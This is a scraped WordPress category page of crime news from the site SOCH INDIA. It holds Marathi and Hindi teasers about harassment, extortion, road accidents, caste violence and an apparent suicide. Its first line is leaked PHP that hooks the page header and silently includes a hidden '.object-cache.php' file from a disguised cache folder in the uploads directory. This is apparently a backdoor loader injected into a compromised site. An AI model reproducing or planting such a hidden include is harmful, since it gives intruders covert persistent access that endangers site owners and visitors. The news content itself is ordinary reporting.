add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

महिला सक्षमीकरणासाठी अशासकीय संस्थेमध्ये काम करणाऱ्या पाटण्यातील महिलेला संयुक्त राष्ट्रांच्या अधिकाऱ्याकडून लैंगिक छळास सामोरे जावे लागल्याची घटना उघड झाली आहे. बिहारमध्ये संयुक्त राष्ट्रांच्या एका प्रकल्पामध्ये एका एनजीओतर्फे ही महिला काम करते. या कामाच्या पाहणीसाठी विदेशातून एक अधिकारी आला होता आणि त्यानं या महिलेला मला खूश केलंस संयुक्त राष्ट्रात नोकरी...

Read More

दुसरे लग्न करण्यासाठी अहमदनगरमध्ये एका तरुणाने चक्क एड्स झाल्याचा बनाव रचल्याचा धक्कादायक प्रकार समोर आला आहे. मात्र, पत्नीला याबाबत शंका आली आणि पतीचा हा बनाव उघड झाला. पोलिसांनी त्याला अटक केली आहे. ‘एबीपी माझा’च्या वृत्तानुसार अहमदनगरमध्ये राहणाऱ्या एका तरुणाला पत्नीकडून घटस्फोट हवा होता. संबंधित दाम्पत्य २०१३ पासून विभक्त राहत...

Read More

गडचिरोलीमध्ये कार आणि काळी-पिवळी वाहनांचा भीषण अपघात झाला असून यामध्ये सात जणांचा मृत्यू झाला आहे. रविवारी सकाळी साडेनऊ वाजण्याच्या सुमारास जिमलगट्टापासून 5 किलोमीटरवर असलेल्या गोविंदगावच्या बस थांब्याजवळ हा अपघात झाला. मृतांमध्ये दोन बालकांसह सात जणांचा समावेश आहे. याशिवाय 5 जण जखमी असून जखमींना उपचारासाठी अहेरीच्या उपजिल्हा रूग्णालयात दाखल करण्यात...

Read More

भांडूप उड्डाणपूलावर शनिवारी सकाळी होंडा सिटी कार आणि कंटेनरचा भीषण अपघात झाला. या दुर्घटनेत दोघांचा मृत्यू झाला असून तीन जण जखमी झाले आहेत. होंडा सिटी कार ठाण्याच्या दिशेने जात असताना ईस्टर्न एक्स्प्रेस हायवेवरील उड्डाणपूलावर हा अपघात झाला. चालकाचे स्टेअरिंगवरील नियंत्रण सुटल्यामुळे कार रस्ता दुभाजक ओलांडून समोरच्या दिशेने येणाऱ्या कंटेनरवर...

Read More

दिल्ली पुलिस ने 4 ऐसे शातिर अपराधियों को गिरफ्तार किया है जो एमसीडी के एक असिस्टेंट इंजीनियर को उसके बेटे को अगवा करने की धमकी दे रहे थे. इतना ही नही, ये शातिर बदमाश उस असिस्टेंट इंजीनियर को डराकर उससे 1 करोड़ 80 लाख की फिरौती की मांग कर...

Read More

अलिबागमधील कार्लेखिंड येथे ‘शिवशाही’ बसने विरुद्ध दिशेने येणाऱ्या एसटी बसला धडक दिल्याची घटना गुरुवारी सकाळी घडली. या घटनेत १५ प्रवासी जखमी झाले असून एसटी बसचालकाची प्रकृती गंभीर आहे. जखमींवर जिल्हा रुग्णालयात उपचार सुरु आहेत. राज्य परिवहन महामंडळाची ‘शिवशाही’ बस मुरुडवरुन स्वारगेटला जात होती. तर एसटी बस पनवेलवरुन अलिबागला येत...

Read More

आंध्रप्रदेशात एका ऑटो रिक्षा चालकाने डोक्यावर १५ लाख रुपयांचे कर्ज झाल्याने पत्नी आणि पोटच्या मुलीला विकायला काढल्याची धक्कादायक घटना समोर आली आहे. या रिक्षा चालकाला चार मुली आणि एक मुलगा असून ही सर्व मुलं अल्पवयीन आहेत. आरोपी रिक्षा चालक ३८ वर्षांचा असून त्याने मुलीच्या विक्रीसाठी एका बाँडवर स्वाक्षरी केली...

Read More

वसई-विरारमध्ये सोमवारी मुसळधार पाऊस कोसळत असताना एका खासगी व्हॅनच्या चालकाने स्वत:च्या प्राणाचे बलिदान देऊन चार शाळकरी मुलांचे प्राण वाचवले. प्रकाश पाटील (४४) असे या धाडसी वाहन चालकाचे नाव असून तो वसई येथे राहायला होता. सध्या गावकऱ्यांमध्ये प्रकाशच्या शौर्याची चर्चा सुरु आहे. सोमवारी प्रकाशने नेहमीप्रमाणे मुलांना शाळेबाहेरुन पीकअप केले व...

Read More

गुजरातमध्ये पुन्हा एकदा जातीय द्वेषाचं प्रकरण समोर आलं आहे. मेहसाणा जिल्ह्यात स्वतःच्या दुचाकीवर छत्रपती शिवाजी महाराजांचा फोटो लावला म्हणून येथे एका दलित युवकाला मारहाण केल्याची घटना उघडकीस आली आहे. या प्रकरणी तातडीने कारवाई करत पोलिसांनी ५ जणांना अटक केली आहे. वीरसंघ झाला(१९), रानूभा झाला(२०), रामजी झाला(३७), विक्रमसिंह झाला(१९) ,...

Read More

केरळमध्ये अर्जेंटिनाचा दिग्गज फुटबॉलपटू लिओनेल मेसीच्या चाहत्याचा मृतदेह सापडल्याने खळबळ उडाली आहे. त्याने आत्महत्या केल्याची शक्यता पोलिसांनी वर्तवली आहे. फिपा फिफा वर्ल्ड कपमध्ये अर्जेंटिनाच्या पराभवामुळे आणि मेसीच्या खराब कामगिरीमुळे तो निराश होता. गुरूवारी क्रोएशियाविरुद्ध अर्जेंटिनाचा 3-0 असा पराभव झाल्यानंतर तो बेपत्ता झाला होता. त्यावेळी एक सुसाइड नोट सोडून बेपत्ता...

Read More